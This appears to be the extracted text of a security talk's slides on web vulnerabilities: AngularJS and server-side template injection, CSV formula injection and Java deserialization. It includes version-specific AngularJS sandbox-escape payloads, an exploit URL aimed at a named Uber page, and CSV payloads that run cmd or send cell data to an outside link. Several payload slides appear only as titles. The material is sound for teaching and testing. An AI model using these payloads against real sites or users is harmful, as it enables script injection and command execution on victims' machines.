nguyen phuong truong anh - some new vulnerabilities in modern web application

Some new vulnerabilities in modern web application

(Part 1)

hkln1 (@anh_npt)

Xin cảm ơn các nhà tài trợ

AngularJS Template Injection (Client-site template injection)

What is AngularJS ?• Popular MVC JavaScript Framework• Maintained and recommended by Google• Read more: • https://docs.angularjs.org/tutorial

What’s risk ? (1)

Not vulnerable

What’s risk ? (2)

???

Four general attack vectors1. Attacking the Sandbox2. Attacking the Sanitizer3. Attacking the CSP Mode4. Attacking the Codebase

The payloads…• 1.0.1 - 1.1.5• {{constructor.constructor('alert(1)')()}}

• 1.2.0 - 1.2.1• {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getP

rototypeOf(a.sub),a).value,0,'alert(1)')()}}

• ….• 1.4.0 - 1.4.9• {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

• 1.5.0-rc2 Fixed

AngularJS injection in the wild (1)• https://hackerone.com/reports/125027

AngularJS injection in the wild (2)• Check: https://developer.uber.com/docs/deeplinking?q=wrtz{{7*7}}• Response: wrtz49 Vulnerable

• Exploit: https://developer.uber.com/docs/deep-linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz

Demo• Piwik

Reference• http://blog.portswigger.net/2016/01/xss-without-html-client-side-te

mplate.html• http://www.slideshare.net/x00mario/an-abusive-relationship-with-an

gularjs

Server-site template injection

What is template engine? (1)• Present dynamic data via web pages and emails.• Separation of presentation (HTML/CSS) from application logic.• Used in wikis, blogs, marketing applications and CMS.• Some template engines:• FreeMarker• Velocity• Smarty• Twig• Jade

What is template engine? (2) <?php echo $param ?> <?php echo htmlspecialchars($var, ENT_QUOTES, ‘UTF-8’) ?>

{{ param }} {{ param | escape}} / {{ param | e}}

What’s risk ?• Not only XSS Remote Code Execution (RCE)• Arbitrary object creation• Arbitrary file read/write• Remote file include• Information disclosure and privilege escalation

Introduction (1)• $output = $twig->render("Dear {first_name},", array("first_name" =>

$user.first_name) ); Not vulnerable

• $output = $twig->render($_GET['custom_email'], array("first_name" => $user.first_name) ); ???

Introduction (2)• custom_email={{7*7}} 49• custom_email={{self}} Object of class

__TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78db3538221c1145580ca4a5 could not be converted to string

Template injection methodology

Detect (1)• Plaintext context

smarty= Hello {user.name}Hello user1

freemarker= Hello ${username}Hello user1

any= <b> Hello </b><b> Hello </b>

smarty= Hello ${7*7}Hello 49

freemarker= Hello ${7*7}Hello 49

Detect (2)• Code context

Personal_greeting = usernameHello user1

Personal_greeting = username<tag>Hello

Personal_greeting = username }} <tag>Hello user01 <tag>

Identify

Exploit• ‘For Template Authors’ - sections covering basic syntax.• ‘Security Considerations’ - chances are whoever developed the app

you're testing didn't read this, and it may contain some useful hints.• Lists of builtin methods, functions, filters, and variables.• Lists of extensions/plugins - some may be enabled by default.

Payloads: Smarty (1)

Payloads: Smarty (2)

Payloads: Smarty (3)

Payloads: Smarty (4)

Payloads: Twig

Payloads: Twig (Sandboxed)

Payloads: Jade

Payloads: FreeMarker

Server-side template injection in the wild

• https://hackerone.com/reports/125980

Demo• Flask/Jinja2• Alfresco

Reference• http://blog.portswigger.net/2015/08/server-side-template-injection.h

tml• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/• https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-pa

rt-ii

Fomular Injection (CSV Injection)

What is CSV Injection ?• Exploit via the export functionality that allow user to download CSV

(Excel) file.• Often contain input from untrusted sources such as survey responses,

transaction details, and user-supplied addresses, …• The attacker can execute any commands on user machine if web

application does not properly validate the contents of the CSV file.

How to test?• =1 + 1 2• -2 + 3 1• +3 + 5 8

The payloads…• =HYPERLINK(https://example.com?test=&A1&A2,”Error: please click

for further information”)

• =DDE(“cmd”;”/C calc”; “DdeLink_60_870516294”)

• =cmd | ‘ /C calc ‘ !A0

CSV Injection in the wild

Demo• Mangento Community

Reference• https://www.owasp.org/index.php/CSV_Excel_Macro_Injection• https://hackerone.com/reports/72785• http://www.contextis.com/resources/blog/comma-separated-vulnera

bilities/

Java deserialization vulnerability

What is serialization ?

What is serialization ? (2)

More complex serialization… (1)

More complex serialization… (2)

Serialization in the context of Java web applications and application

servers• In HTTP requests – Parameters, ViewState, Cookies• RMI – The extensively used Java RMI protocol• RMI over HTTP – Many Java thick client web apps use this• JMX• Custom Protocols

What’s problems ?• What if we knew of an object that implemented a “readObject”

method that did something dangerous ?• What if instead of appending an exclamation point to a user defined

string ?

How to identify wherever an application might be vulnerable ?

Java deserialization vulnerability in the wild• http://artsploit.blogspot.com/2016/01/paypal-rce.html

Analysis of exploiting the real cases – Jboss application (1)

1. Identify

Analysis of exploiting the real cases – Jboss application (2)

1. Exploit

Demo

Analysis of exploiting the real cases – Jenkins

application (1)1. Vulnerability Detection

Analysis of exploiting the real cases – Jenkins

application (2)1. Vulnerability Detection

Analysis of exploiting the real cases – Jenkins

application (3)1. Vulnerability Detection

Analysis of exploiting the real cases – Jenkins

application (3)2. Exploit Development

Analysis of exploiting the real cases – Jenkins

application (3)2. Exploit Development

Analysis of exploiting the real cases – Jenkins

application (3)2. Exploit Development

Analysis of exploiting the real cases – Jenkins

application (4)2. Exploit Development

Analysis of exploiting the real cases – Jenkinsapplication (5)2. Exploit Development

Demo

Reference• https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websph

ere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/• http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pick

les• https://www.youtube.com/watch?v=VviY3O-euVQ